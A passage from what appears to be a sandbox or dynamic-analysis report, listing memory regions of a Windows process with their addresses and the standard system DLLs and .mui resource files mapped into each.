= "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3659 start_va = 0x120000 end_va = 0x12ffff monitored = 0 entry_point = 0x12a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 3660 start_va = 0x130000 end_va = 0x131fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 3661 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3662 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3663 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "workflowservicehostperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\WorkflowServiceHostPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\workflowservicehostperformancecounters.dll") Region: id = 3664 start_va = 0x150000 end_va = 0x155fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "workflowservicehostperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\WorkflowServiceHostPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\workflowservicehostperformancecounters.dll.mui") Region: id = 3665 start_va = 0xe30000 end_va = 0xe83fff monitored = 0 entry_point = 0xe43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3666 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3667 start_va = 0xe30000 end_va = 0xe83fff monitored = 0 entry_point = 0xe43450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3668 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3669 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3670 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3671 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3672 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3673 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3674 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3675 start_va = 0xd70000 end_va = 0xd90fff monitored = 0 entry_point = 0xd8a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3676 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3677 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3678 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3679 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3680 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3681 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3682 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3683 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3684 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3685 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3686 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3687 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3688 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3689 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3690 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3691 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3692 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3693 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3694 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3695 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe768c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3696 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3697 start_va = 0x13f0000 end_va = 0x14cbfff monitored = 0 entry_point = 0x1465ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3698 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3699 start_va = 0x13f0000 end_va = 0x14cbfff monitored = 0 entry_point = 0x1465ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3700 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3701 start_va = 0x13f0000 end_va = 0x14d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3702 start_va = 0xd70000 end_va = 0xd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3703 start_va = 0x13f0000 end_va = 0x14d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3704 start_va = 0xd70000 end_va = 0xd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3705 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3706 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3707 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3708 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3709 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3710 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3711 start_va = 0x13f0000 end_va = 0x1498fff monitored = 0 entry_point = 0x14018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3712 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3713 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3714 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3715 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3716 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3717 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3718 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3719 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3720 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3721 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3722 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3723 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3724 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3725 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3726 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3727 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3728 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3729 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3730 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3731 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3732 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3733 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3734 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3735 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3736 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3737 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3738 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3739 start_va = 0xe30000 end_va = 0xe7ffff monitored = 0 entry_point = 0xe32b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3740 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3741 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3742 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3743 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3744 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3745 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3746 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3747 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3748 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3749 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3750 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3751 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3752 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3753 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3754 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3755 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3756 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3757 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3758 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3759 start_va = 0x10e0000 end_va = 0x116afff monitored = 0 entry_point = 0x11551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3760 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3761 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3762 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3763 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3764 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3765 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: 